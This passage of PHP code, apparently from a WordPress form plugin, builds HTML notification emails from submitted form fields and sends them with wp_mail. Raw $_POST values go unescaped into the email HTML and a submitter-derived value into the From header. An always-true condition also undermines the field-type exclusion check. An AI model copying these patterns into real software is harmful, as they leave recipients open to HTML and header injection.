							$new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
						  }
						  for ($k = 0; $k < 50; $k++) {
							$temp_val = $_POST[$key."_element_property_value".$id.$k];
							if (isset($temp_val)) {	
							  $new_value .= '<br/>' . $_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
							}
						  }
						  break;	
						}
						case "type_paypal_shipping": {
						  $new_value = $_POST[$key."_element_label".$id].' : '.$_POST[$key."_element".$id].$form_currency;		
						  break;
						}
						case "type_paypal_checkbox": {
						  $start = -1;
						  for($j = 0; $j < 100; $j++) {
							$element = $_POST[$key."_element".$id.$j];
							if (isset($element)) {
							  $start = $j;
							  break;
							}
						  }
						  if ($start != -1) {
							for ($j = $start; $j<100; $j++) {
							  $element = $_POST[$key."_element".$id.$j];
							  if (isset($element)) {
								$new_value = $new_value.$_POST[$key."_element".$id.$j."_label"].' - '.(($_POST[$key."_element".$id.$j] == '') ? '0'.$form_currency : $_POST[$key."_element".$id.$j]).$form_currency.'<br>';
							  }
							}
						  }
						  $element_quantity_label = $_POST[$key."_element_quantity_label".$id];
						  if (isset($element_quantity_label)) {
							$quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
							$new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
						  }
						  for ($k = 0; $k < 50; $k++) {
							$temp_val = $_POST[$key."_element_property_value".$id.$k];
							if (isset($temp_val)) {			
							  $new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
							}
						  }
						  break;
						}
						case "type_star_rating":
									  {
										$element=$_POST[$key."_star_amount".$id];
										$selected=(isset($_POST[$key."_selected_star_amount".$id]) ? $_POST[$key."_selected_star_amount".$id] : 0);
										
										
										if(isset($element))
										{
										  $new_value=$new_value.$selected.'/'.$element;					
										}
										break;
									  }
									  

									  case "type_scale_rating":
									  {
									  $element=$_POST[$key."_scale_amount".$id];
									  $selected=(isset($_POST[$key."_scale_radio".$id]) ? $_POST[$key."_scale_radio".$id] : 0);
									  
										
										if(isset($element))
										{
										  $new_value=$new_value.$selected.'/'.$element;					
										}
										break;
									  }
									  
									  case "type_spinner":
									  {

										if (isset($_POST[$key."_element".$id])) {
										  $new_value = $new_value . $_POST[$key."_element".$id];					
										}
										break;
									  }
									  
									  case "type_slider":
									  {

										$element=$_POST[$key."_slider_value".$id];
										if(isset($element))
										{
										  $new_value=$new_value.$element;					
										}
										break;
									  }
									  case "type_range":
									  {

										$element0=$_POST[$key."_element".$id.'0'];
										$element1=$_POST[$key."_element".$id.'1'];
										if(isset($element0) || isset($element1))
										{
										  $new_value=$new_value.$element0.'-'.$element1;					
										}
										break;
									  }
									  
									  case "type_grading":
									  {
										$element=$_POST[$key."_hidden_item".$id];
										$grading = explode(":",$element);
										$items_count = sizeof($grading)-1;
										
										$element = "";
										$total = "";
										
										for($k=0;$k<$items_count;$k++)

										{
										  $element .= $grading[$k].":".$_POST[$key."_element".$id.$k]." ";
									  $total += $_POST[$key."_element".$id.$k];
									}

									$element .="Total:".$total;

															  
									if(isset($element))
									{
									  $new_value=$new_value.$element;					
									}
									break;
								  }
								  
									case "type_matrix":
								  {
								  
									
									$input_type=$_POST[$key."_input_type".$id]; 
												
									$mat_rows = $_POST[$key."_hidden_row".$id];
									$mat_rows = explode('***', $mat_rows);
									$mat_rows = array_slice($mat_rows,0, count($mat_rows)-1);
									
									$mat_columns = $_POST[$key."_hidden_column".$id];
									$mat_columns = explode('***', $mat_columns);
									$mat_columns = array_slice($mat_columns,0, count($mat_columns)-1);
								  
									$row_ids=explode(",",substr($_POST[$key."_row_ids".$id], 0, -1));
									$column_ids=explode(",",substr($_POST[$key."_column_ids".$id], 0, -1)); 
						
										  
									$matrix="<table>";
										  
									  $matrix .='<tr><td></td>';
									
									for( $k=0;$k< count($mat_columns) ;$k++)
									  $matrix .='<td style="background-color:#BBBBBB; padding:5px; ">'.$mat_columns[$k].'</td>';
									  $matrix .='</tr>';
									
									$aaa=Array();
									   $k=0;
									foreach( $row_ids as $row_id){
									$matrix .='<tr><td style="background-color:#BBBBBB; padding:5px;">'.$mat_rows[$k].'</td>';
									
									  if($input_type=="radio"){
									 
									$mat_radio = (isset($_POST[$key."_input_element".$id.$row_id]) ? $_POST[$key."_input_element".$id.$row_id] : 0);											
									  if($mat_radio==0){
										$checked="";
										$aaa[1]="";
										}
										else{
										$aaa=explode("_",$mat_radio);
										}
										
										foreach( $column_ids as $column_id){
										  if($aaa[1]==$column_id)
										  $checked="checked";
										  else
										  $checked="";
										$matrix .='<td style="text-align:center"><input  type="radio" '.$checked.' disabled /></td>';
										
										}
										
									  } 
									  else{
									  if($input_type=="checkbox")
									  {                
										foreach( $column_ids as $column_id){
										 $checked = $_POST[$key."_input_element".$id.$row_id.'_'.$column_id];                              
										 if($checked==1)							
										 $checked = "checked";						
										 else									 
										 $checked = "";

										$matrix .='<td style="text-align:center"><input  type="checkbox" '.$checked.' disabled /></td>';
									  
									  }
									  
									  }
									  else
									  {
									  if($input_type=="text")
									  {
													
										foreach( $column_ids as $column_id){
										 $checked = $_POST[$key."_input_element".$id.$row_id.'_'.$column_id];
										  
										$matrix .='<td style="text-align:center"><input  type="text" value="'.$checked.'" disabled /></td>';
								  
									  }
									  
									  }
									  else{
										foreach( $column_ids as $column_id){
										 $checked = $_POST[$key."_select_yes_no".$id.$row_id.'_'.$column_id];
										   $matrix .='<td style="text-align:center">'.$checked.'</td>';
										
								
									  
										}
									  }
									  
									  }
									  
									  }
									  $matrix .='</tr>';
									  $k++;
									}
									 $matrix .='</table>';

						  
						  
						  
															
									if(isset($matrix))
									{
									  $new_value=$new_value.$matrix;					
									}
								  
									break;
								  }
						default: break;
					  }
					  $new_script = str_replace("%".$label_each."%", $new_value, $new_script);	
					}
				  }
				}       
				if (strpos($new_script, "%all%") !== FALSE) {
				  $new_script = str_replace("%all%", $list, $new_script);
				}
				$body = $new_script;
				$send = wp_mail(str_replace(' ', '', $recipient), $subject, stripslashes($body), $headers, $attachment);
			  }
			  if ($row->mail) {
				if ($c) {
				  // $headers_form_mail = "From: " . $c . " <" . $c . ">" . "\r\n";
				  $headers = "From: '" . $c . "' <" . $c . ">" . "\r\n" . "Content-Type: text/html; charset=\"" . get_option('blog_charset') . "\"\n";
				}
				// else {
				  // $headers_form_mail = "";
				// }
				if ($row_mail_one_time) {
				  $recipient = $row->mail;
				  $subject = $row->title;
				  $new_script = wpautop($row->script_mail);
				  foreach($label_order_original as $key => $label_each) {	
					if (strpos($row->script_mail, "%" . $label_each . "%") !== FALSE) {
					  $type = $label_type[$key];
					  if ($type != "type_submit_reset" or $type!="type_map" or $type!="type_editor" or  $type!="type_captcha" or $type != "type_arithmetic_captcha" or  $type!="type_recaptcha" or  $type!="type_button") {
						$new_value ="";
						switch ($type) {
						  case 'type_text':
						  case 'type_password':
						  case 'type_textarea':
						  case "type_date":
						  case "type_own_select":					
						  case "type_country":				
						  case "type_number":	 {
							$element = $_POST[$key."_element".$id];
							if (isset($element)) {
							  $new_value = $element;					
							}
							break;
						  }
						  case "type_hidden": {
							$element = $_POST[$element_label];
							if(isset($element))
							{
							  $new_value = $element;	
							}
							break;
						  }
						  case "type_mark_map": {
							$element = $_POST[$key."_long".$id];
							if (isset($element)) {
							  $new_value = 'Longitude:'.$_POST[$key."_long".$id].'<br/>Latitude:'.$_POST[$key."_lat".$id];
							}
							break;		
						  }
						  case "type_submitter_mail": {
							$element = $_POST[$key."_element".$id];
							if (isset($element)) {
							  $new_value = $element;					
							}
							break;
						  }
						  case "type_time": {
							$hh = $_POST[$key."_hh".$id];
							if (isset($hh)) {
							  $ss = $_POST[$key."_ss".$id];
							  if (isset($ss)) {
								$new_value = $_POST[$key."_hh".$id].':'.$_POST[$key."_mm".$id].':'.$_POST[$key."_ss".$id];
							  }
							  else {
								$new_value = $_POST[$key."_hh".$id].':'.$_POST[$key."_mm".$id];
							  }
							  $am_pm = $_POST[$key."_am_pm".$id];
							  if (isset($am_pm)) {
								$new_value = $new_value.' '.$_POST[$key."_am_pm".$id];
							  }
							}
							break;
						  }
						  case "type_phone": {
							$element_first = $_POST[$key."_element_first".$id];
							if (isset($element_first)) {
							  $new_value = $_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id];
							}	
							break;
						  }
						  case "type_name": {
							$element_first = $_POST[$key."_element_first".$id];
							if (isset($element_first)) {
							  $element_title = $_POST[$key."_element_title".$id];
							  if (isset($element_title)) {
								$new_value = $_POST[$key."_element_title".$id].' '.$_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id].' '.$_POST[$key."_element_middle".$id];
							  }
							  else {
								$new_value = $_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id];
							  }
							}	   
							break;		
						  }
						  case "type_address": {
							$street1 = $_POST[$key."_street1".$id];
							if (isset($_POST[$key."_street1".$id])) {
							  $new_value = $new_value.$_POST[$key."_street1".$id];
							  break;
							}
							if (isset($_POST[$key."_street2".$id])) {
							  $new_value=$new_value.$_POST[$key."_street2".$id];
							  break;
							}
							if (isset($_POST[$key."_city".$id])) {
							  $new_value=$new_value.$_POST[$key."_city".$id];
							  break;
							}
							if (isset($_POST[$key."_state".$id])) {
							  $new_value=$new_value.$_POST[$key."_state".$id];
							  break;
							}
							if (isset($_POST[$key."_postal".$id])) {
							  $new_value=$new_value.$_POST[$key."_postal".$id];
							  break;
							}
							if (isset($_POST[$key."_country".$id])) {
							  $new_value=$new_value.$_POST[$key."_country".$id];
							  break;
							}
						  }
						  case "type_date_fields": {
							$day = $_POST[$key."_day".$id];
							if (isset($day)) {
							  $new_value = $_POST[$key."_day".$id].'-'.$_POST[$key."_month".$id].'-'.$_POST[$key."_year".$id];
							}
							break;
						  }
						  case "type_radio": {
							$element = $_POST[$key."_other_input".$id];
							if (isset($element)) {
							  $new_value = $_POST[$key."_other_input".$id];
							  break;
							}
							$element = $_POST[$key."_element".$id];
							if (isset($element)) {
							  $new_value = $element;					
							}
							break;
						  }
						  case "type_checkbox": {
							$start = -1;
							for ($j=0; $j<100; $j++) {
							  $element = $_POST[$key."_element".$id.$j];
							  if (isset($element)) {
								$start = $j;
								break;
							  }
							}	
							$other_element_id=-1;
							$is_other = $_POST[$key."_allow_other".$id];
							if ($is_other == "yes") {
							  $other_element_id = $_POST[$key."_allow_other_num".$id];
							}
							if ($start != -1) {
							  for ($j = $start; $j < 100; $j++) {
								$element = $_POST[$key."_element".$id.$j];
								if (isset($element)) {
								  if ($j == $other_element_id) {
									$new_value = $new_value.$_POST[$key."_other_input".$id].'<br>';
								  }
								  else {
									$new_value = $new_value.$_POST[$key."_element".$id.$j].'<br>';
								  }
								}
							  }
							}
							break;
						  }
						  case "type_paypal_price": {
							$new_value = 0;
							if ($_POST[$key."_element_dollars".$id]) {
							  $new_value = $_POST[$key."_element_dollars".$id];
							}
							if ($_POST[$key."_element_cents".$id]) {
							  $new_value = $new_value.'.'.$_POST[$key."_element_cents".$id];
							}
							$new_value = $new_value.$form_currency;
							break;
						  }
						  case "type_paypal_select": {
							$new_value = $_POST[$key."_element_label".$id].':'.$_POST[$key."_element".$id].$form_currency;
							$element_quantity_label = $_POST[$key."_element_quantity_label".$id];
							if (isset($element_quantity_label)) {
							  $quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
							  $new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
							}
							for($k = 0; $k < 50; $k++) {
							  $temp_val = $_POST[$key."_element_property_value".$id.$k];
							  if (isset($temp_val)) {
								$new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
							  }
							}
							break;
						  }
						  case "type_paypal_radio": {
							$new_value = $_POST[$key."_element_label".$id].' - '.$_POST[$key."_element".$id].$form_currency;
							$element_quantity_label = $_POST[$key."_element_quantity_label".$id];
							if (isset($element_quantity_label)) {
							  $quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
							  $new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
							}
							for ($k = 0; $k < 50; $k++) {
							  $temp_val = $_POST[$key."_element_property_value".$id.$k];
							  if (isset($temp_val)) {
								$new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
							  }
							}
							break;
						  }
						  case "type_paypal_shipping": {
							$new_value = $_POST[$key."_element_label".$id].' : '.$_POST[$key."_element".$id].$form_currency;
							break;
						  }
						  case "type_paypal_checkbox": {
							$start = -1;
							for ($j = 0; $j < 100; $j++) {
							  $element = $_POST[$key."_element".$id.$j];
							  if (isset($element)) {
								$start = $j;
								break;
							  }
							}
							if ($start != -1) {
							  for ($j = $start; $j < 100; $j++) {
								$element = $_POST[$key."_element".$id.$j];
								if (isset($element)) {
								  $new_value = $new_value.$_POST[$key."_element".$id.$j."_label"].' - '.(($_POST[$key."_element".$id.$j] == '') ? '0'.$form_currency : $_POST[$key."_element".$id.$j]).$form_currency.'<br>';
								}
							  }
							}
							$element_quantity_label = $_POST[$key."_element_quantity_label".$id];
							if (isset($element_quantity_label)) {
							  $quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
							  $new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
							}
							for ($k = 0; $k < 50; $k++) {
							  $temp_val = $_POST[$key."_element_property_value".$id.$k];
							  if (isset($temp_val)) {
								$new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
							  }
							}
							break;
						  }
						  case "type_star_rating": {
							if (isset($_POST[$key."_star_amount".$id])) {
							  $selected = (isset($_POST[$key."_selected_star_amount".$id]) ? $_POST[$key."_selected_star_amount".$id] : 0);
							  $new_value = $new_value.$selected.'/'.$_POST[$key."_star_amount".$id];					
							}
							break;
						  }
						  case "type_scale_rating": {
							if (isset($_POST[$key."_scale_amount".$id])) {
							  $selected = (isset($_POST[$key."_scale_radio".$id]) ? $_POST[$key."_scale_radio".$id] : 0);
							  $new_value=$new_value.$selected.'/'.$_POST[$key."_scale_amount".$id];					
							}
							break;
						  }
						  case "type_spinner": {
							if(isset($_POST[$key."_element".$id])) {
							  $new_value = $new_value.$_POST[$key."_element".$id];					
							}
							break;
						  }
						  case "type_slider": {
							if (isset($_POST[$key."_slider_value".$id])) {
							  $new_value = $new_value.$_POST[$key."_slider_value".$id];
							}
							break;
						  }
						  case "type_range": {
							if (isset($_POST[$key."_element".$id.'0']) || isset($_POST[$key."_element".$id.'1'])) {
							  $new_value=$new_value.$_POST[$key."_element".$id.'0'].'-'.$_POST[$key."_element".$id.'1'];
							}
							break;
						  }
									  
									  case "type_grading":
									  {
										$element=$_POST[$key."_hidden_item".$id];
										$grading = explode(":",$element);
										$items_count = sizeof($grading)-1;
										
										$element = "";
										$total = "";
										
										for($k=0;$k<$items_count;$k++) {
										  $element .= $grading[$k].":".$_POST[$key."_element".$id.$k]." ";
									  $total += $_POST[$key."_element".$id.$k];
									}

									$element .="Total:".$total;

															  
									if(isset($element))
									{
									  $new_value=$new_value.$element;					
									}
									break;
								  }
								  
									case "type_matrix":
								  {
								  
									
									$input_type=$_POST[$key."_input_type".$id]; 
												
									$mat_rows = $_POST[$key."_hidden_row".$id];
									$mat_rows = explode('***', $mat_rows);
									$mat_rows = array_slice($mat_rows,0, count($mat_rows)-1);
									
									$mat_columns = $_POST[$key."_hidden_column".$id];
									$mat_columns = explode('***', $mat_columns);
									$mat_columns = array_slice($mat_columns,0, count($mat_columns)-1);
								  
									$row_ids=explode(",",substr($_POST[$key."_row_ids".$id], 0, -1));
									$column_ids=explode(",",substr($_POST[$key."_column_ids".$id], 0, -1)); 
									$matrix="<table>";
										  
									$matrix .='<tr><td></td>';
									
									for( $k=0;$k< count($mat_columns) ;$k++)
									  $matrix .='<td style="background-color:#BBBBBB; padding:5px; ">'.$mat_columns[$k].'</td>';
									  $matrix .='</tr>';
									
									$aaa=Array();
									   $k=0;
									foreach( $row_ids as $row_id){
									$matrix .='<tr><td style="background-color:#BBBBBB; padding:5px;">'.$mat_rows[$k].'</td>';
									
									  if($input_type=="radio"){
									 
									$mat_radio = (isset($_POST[$key."_input_element".$id.$row_id]) ? $_POST[$key."_input_element".$id.$row_id] : 0);											
									  if($mat_radio==0){
										$checked="";
										$aaa[1]="";
										}
										else{
										$aaa=explode("_",$mat_radio);
										}
										
										foreach( $column_ids as $column_id){
										  if($aaa[1]==$column_id)
										  $checked="checked";
										  else
										  $checked="";
										$matrix .='<td style="text-align:center"><input  type="radio" '.$checked.' disabled /></td>';
										
										}
										
									  } 
									  else{
									  if($input_type=="checkbox")
									  {                
										foreach( $column_ids as $column_id){
										 $checked = $_POST[$key."_input_element".$id.$row_id.'_'.$column_id];                              
										 if($checked==1)							
										 $checked = "checked";						
										 else									 
										 $checked = "";

										$matrix .='<td style="text-align:center"><input  type="checkbox" '.$checked.' disabled /></td>';
									  
									  }
									  
									  }
									  else
									  {
									  if($input_type=="text")
									  {
													
										foreach( $column_ids as $column_id){
										 $checked = $_POST[$key."_input_element".$id.$row_id.'_'.$column_id];
										  
										$matrix .='<td style="text-align:center"><input  type="text" value="'.$checked.'" disabled /></td>';
								  
									  }
									  
									  }
									  else{
										foreach( $column_ids as $column_id){
										 $checked = $_POST[$key."_select_yes_no".$id.$row_id.'_'.$column_id];
										   $matrix .='<td style="text-align:center">'.$checked.'</td>';
										
								
									  
									  }
									  }
									  
									  }
									  
									  }
									  $matrix .='</tr>';
									  $k++;
									}
									 $matrix .='</table>';

						  
						  
						  
															
									if(isset($matrix))
									{
									  $new_value=$new_value.$matrix;					
									}
								  
									break;
								  }
						  default: break;
						}
						$new_script = str_replace("%".$label_each."%", $new_value, $new_script);	
					  }
					}
				  }
				  if (strpos($new_script, "%all%") !== FALSE) {
					$new_script = str_replace("%all%", $list, $new_script);
				  }
				  $body = $new_script;
				  $mode = 1;
				  $send = wp_mail(str_replace(' ', '', $recipient), $subject, stripslashes($body), $headers, $attachment);
				  $row_mail_one_time = 0;
				}
			  }
			}
		  }
		  else {
			if ($row->mail) {
			  $recipient = $row->mail;
			  $subject = $row->title;
			  $new_script = wpautop($row->script_mail);
			  foreach($label_order_original as $key => $label_each) {
				if (strpos($row->script_mail, "%" . $label_each . "%") !== FALSE) {
				  $type = $label_type[$key];
				  if ($type != "type_submit_reset" or $type != "type_map" or $type != "type_editor" or  $type!="type_captcha" or $type != "type_arithmetic_captcha" or  $type!="type_recaptcha" or  $type!="type_button") {
					$new_value = "";
					switch ($type) {
					  case 'type_text':
					  case 'type_password':
					  case 'type_textarea':
					  case "type_date":
					  case "type_own_select":					
					  case "type_country":				
					  case "type_number":	{
						$element = $_POST[$key."_element".$id];
						if (isset($element)) {
						  $new_value = $element;					
						}
						break;
					  }
					  case "type_hidden": {
						$element = $_POST[$element_label];
						if (isset($element)) {
						  $new_value = $element;	
						}
						break;
					  }
					  case "type_mark_map": {
						$element = $_POST[$key."_long".$id];
						if (isset($element)) {
						  $new_value = 'Longitude:'.$_POST[$key."_long".$id].'<br/>Latitude:'.$_POST[$key."_lat".$id];
						}
						break;
					  }
					  case "type_submitter_mail": {
						$element = $_POST[$key."_element".$id];
						if (isset($element)) {
						  $new_value = $element;					
						}
						break;		
					  }
					  case "type_time": {
						$hh = $_POST[$key."_hh".$id];
						if (isset($hh)) {
						  $ss = $_POST[$key."_ss".$id];
						  if (isset($ss)) {
							$new_value = $_POST[$key."_hh".$id].':'.$_POST[$key."_mm".$id].':'.$_POST[$key."_ss".$id];
						  }
						  else {
							$new_value = $_POST[$key."_hh".$id].':'.$_POST[$key."_mm".$id];
						  }
						  $am_pm = $_POST[$key."_am_pm".$id];
						  if (isset($am_pm)) {
							$new_value = $new_value.' '.$_POST[$key."_am_pm".$id];
						  }
						}
						break;
					  }
					  case "type_phone": {
						$element_first = $_POST[$key."_element_first".$id];
						if (isset($element_first)) {
						  $new_value = $_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id];
						}
						break;
					  }
					  case "type_name": {
						$element_first = $_POST[$key."_element_first".$id];
						if (isset($element_first)) {
						  $element_title = $_POST[$key."_element_title".$id];
						  if (isset($element_title)) {
							$new_value = $_POST[$key."_element_title".$id].' '.$_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id].' '.$_POST[$key."_element_middle".$id];
						  }
						  else {
							$new_value = $_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id];
						  }
						}	   
						break;
					  }
					  case "type_address": {
						if (isset($_POST[$key."_street1".$id])) {
						  $new_value = $new_value.$_POST[$key."_street1".$id];
						  break;
						}
						if (isset($_POST[$key."_street2".$id])) {
						  $new_value = $new_value.$_POST[$key."_street2".$id];
						  break;
						}
						if (isset($_POST[$key."_city".$id])) {
						  $new_value = $new_value.$_POST[$key."_city".$id];
						  break;
						}
						if (isset($_POST[$key."_state".$id])) {
						  $new_value = $new_value.$_POST[$key."_state".$id];
						  break;
						}
						if (isset($_POST[$key."_postal".$id])) {
						  $new_value = $new_value.$_POST[$key."_postal".$id];
						  break;
						}
						if (isset($_POST[$key."_country".$id])) {
						  $new_value = $new_value.$_POST[$key."_country".$id];
						  break;
						}
					  }
					  case "type_date_fields": {
						$day = $_POST[$key."_day".$id];
						if (isset($day)) {
						  $new_value = $_POST[$key."_day".$id].'-'.$_POST[$key."_month".$id].'-'.$_POST[$key."_year".$id];
						}
						break;
					  }
					  case "type_radio": {
						$element = $_POST[$key."_other_input".$id];
						if (isset($element)) {
						  $new_value = $_POST[$key."_other_input".$id];
						  break;
						}
						$element = $_POST[$key."_element".$id];
						if (isset($element)) {
						  $new_value = $element;
						}
						break;
					  }
					  case "type_checkbox": {
						$start = -1;
						for ($j = 0; $j < 100; $j++) {
						  $element = $_POST[$key."_element".$id.$j];
						  if (isset($element)) {
							$start = $j;
							break;
						  }
						}
						$other_element_id = -1;
						$is_other = $_POST[$key."_allow_other".$id];
						if ($is_other == "yes") {
						  $other_element_id = $_POST[$key."_allow_other_num".$id];
						}
						if ($start != -1) {
						  for ($j = $start; $j < 100; $j++) {
							$element = $_POST[$key."_element".$id.$j];
							if (isset($element)) {
							  if ($j == $other_element_id) {
								$new_value = $new_value.$_POST[$key."_other_input".$id].'<br>';
							  }
							  else {
								$new_value = $new_value.$_POST[$key."_element".$id.$j].'<br>';
							  }
							}
						  }
						}
						break;
					  }
					  case "type_paypal_price": {		
						$new_value = 0;
						if ($_POST[$key."_element_dollars".$id]) {
						  $new_value = $_POST[$key."_element_dollars".$id];
						}
						if ($_POST[$key."_element_cents".$id]) {
						  $new_value = $new_value.'.'.$_POST[$key."_element_cents".$id];
						}
						$new_value = $new_value.$form_currency;
						break;
					  }
					  case "type_paypal_select": {	
						$new_value = $_POST[$key."_element_label".$id].':'.$_POST[$key."_element".$id].$form_currency;
						$element_quantity_label = $_POST[$key."_element_quantity_label".$id];
						if (isset($element_quantity_label)) {
						  $quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
						  $new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
						}
						for ($k = 0; $k < 50; $k++) {
						  $temp_val = $_POST[$key."_element_property_value".$id.$k];
						  if (isset($temp_val)) {			
							$new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
						  }
						}
						break;
					  }
					  case "type_paypal_radio": {
						$new_value = $_POST[$key."_element_label".$id].' - '.$_POST[$key."_element".$id].$form_currency;
						$element_quantity_label = $_POST[$key."_element_quantity_label".$id];
						if (isset($element_quantity_label)) {
						  $quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
						  $new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
						}
						for ($k = 0; $k < 50; $k++) {
						  $temp_val = $_POST[$key."_element_property_value".$id.$k];
						  if (isset($temp_val)) {			
							$new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
						  }
						}
						break;	
					  }
					  case "type_paypal_shipping": {
						$new_value = $_POST[$key."_element_label".$id].' : '.$_POST[$key."_element".$id].$form_currency;
						break;
					  }
					  case "type_paypal_checkbox": {
						$start = -1;
						for ($j = 0; $j < 100; $j++) {
						  $element = $_POST[$key."_element".$id.$j];
						  if (isset($element)) {
							$start = $j;
							break;
						  }
						}
						if ($start != -1) {
						  for ($j = $start; $j < 100; $j++) {
							$element = $_POST[$key."_element".$id.$j];
							if (isset($element)) {
							  $new_value = $new_value.$_POST[$key."_element".$id.$j."_label"].' - '.(($_POST[$key."_element".$id.$j] == '') ? '0'.$form_currency : $_POST[$key."_element".$id.$j]).$form_currency.'<br>';
							}
						  }
						}
						$element_quantity_label = $_POST[$key."_element_quantity_label".$id];
						if (isset($element_quantity_label)) {
						  $quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
						  $new_value .= '<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
						}
						for ($k = 0; $k < 50; $k++) {
						  $temp_val = $_POST[$key."_element_property_value".$id.$k];
						  if (isset($temp_val)) {			
							$new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$key."_element_property_value".$id.$k];
						  }
						}
						break;
					  }
					  case "type_star_rating":
									  {
										$element=$_POST[$key."_star_amount".$id];
										$selected=(isset($_POST[$key."_selected_star_amount".$id]) ? $_POST[$key."_selected_star_amount".$id] : 0);
										if(isset($element))
										{
										  $new_value=$new_value.$selected.'/'.$element;					
										}
										break;
									  }
									  

									  case "type_scale_rating":
									  {
									  $element=$_POST[$key."_scale_amount".$id];
									  $selected=(isset($_POST[$key."_scale_radio".$id]) ? $_POST[$key."_scale_radio".$id] : 0);
									  
										
										if(isset($element))
										{
										  $new_value=$new_value.$selected.'/'.$element;					
										}
										break;
									  }
									  
									  case "type_spinner":
									  {

										if(isset($_POST[$key."_element".$id]))
										{
										  $new_value=$new_value.$_POST[$key."_element".$id];					
										}
										break;
									  }
									  
									  case "type_slider":
									  {

										$element=$_POST[$key."_slider_value".$id];
										if(isset($element))
										{
										  $new_value=$new_value.$element;					
										}
										break;
									  }
									  case "type_range":
									  {

										$element0=$_POST[$key."_element".$id.'0'];
										$element1=$_POST[$key."_element".$id.'1'];
										if(isset($element0) || isset($element1))
										{
										  $new_value=$new_value.$element0.'-'.$element1;					
										}
										break;
									  }
									  
									  case "type_grading":
									  {
										$element=$_POST[$key."_hidden_item".$id];
										$grading = explode(":",$element);
										$items_count = sizeof($grading)-1;
										
										$element = "";
										$total = "";
										
										for($k=0;$k<$items_count;$k++)

										{
										  $element .= $grading[$k].":".$_POST[$key."_element".$id.$k]." ";
									  $total += $_POST[$key."_element".$id.$k];
									}

									$element .="Total:".$total;

															  
									if(isset($element))
									{
									  $new_value=$new_value.$element;					
									}
									break;
								  }
								  
									case "type_matrix":
								  {
								  
									
									$input_type=$_POST[$key."_input_type".$id]; 
												
									$mat_rows = $_POST[$key."_hidden_row".$id];
									$mat_rows = explode('***', $mat_rows);
									$mat_rows = array_slice($mat_rows,0, count($mat_rows)-1);
									
									$mat_columns = $_POST[$key."_hidden_column".$id];
									$mat_columns = explode('***', $mat_columns);
									$mat_columns = array_slice($mat_columns,0, count($mat_columns)-1);
								  
									$row_ids=explode(",",substr($_POST[$key."_row_ids".$id], 0, -1));
									$column_ids=explode(",",substr($_POST[$key."_column_ids".$id], 0, -1)); 
												  
										  
									$matrix="<table>";
										  
									  $matrix .='<tr><td></td>';
									
									for( $k=0;$k< count($mat_columns) ;$k++)
									  $matrix .='<td style="background-color:#BBBBBB; padding:5px; ">'.$mat_columns[$k].'</td>';
									  $matrix .='</tr>';
									
									$aaa=Array();
									   $k=0;
									foreach($row_ids as $row_id)
									{
									$matrix .='<tr><td style="background-color:#BBBBBB; padding:5px;">'.$mat_rows[$k].'</td>';
									
									  if($input_type=="radio"){
									 
									$mat_radio = (isset($_POST[$key."_input_element".$id.$row_id]) ? $_POST[$key."_input_element".$id.$row_id] : 0);											
									  if($mat_radio==0){
										$checked="";
										$aaa[1]="";
										}
										else{
										$aaa=explode("_",$mat_radio);
										}
										
										foreach($column_ids as $column_id){
										  if($aaa[1]==$column_id)
										  $checked="checked";
										  else
										  $checked="";
										$matrix .='<td style="text-align:center"><input  type="radio" '.$checked.' disabled /></td>';
										
										}
										
									  } 
									  else{
									  if($input_type=="checkbox")
									  {                
										foreach($column_ids as $column_id){
										 $checked = $_POST[$key."_input_element".$id.$row_id.'_'.$column_id];                              
										 if($checked==1)							
										 $checked = "checked";						
										 else									 
										 $checked = "";

										$matrix .='<td style="text-align:center"><input  type="checkbox" '.$checked.' disabled /></td>';
									  
									  }
									  
									  }
									  else
									  {
									  if($input_type=="text")
									  {
													
										foreach($column_ids as $column_id){
										 $checked = $_POST[$key."_input_element".$id.$row_id.'_'.$column_id];
										  
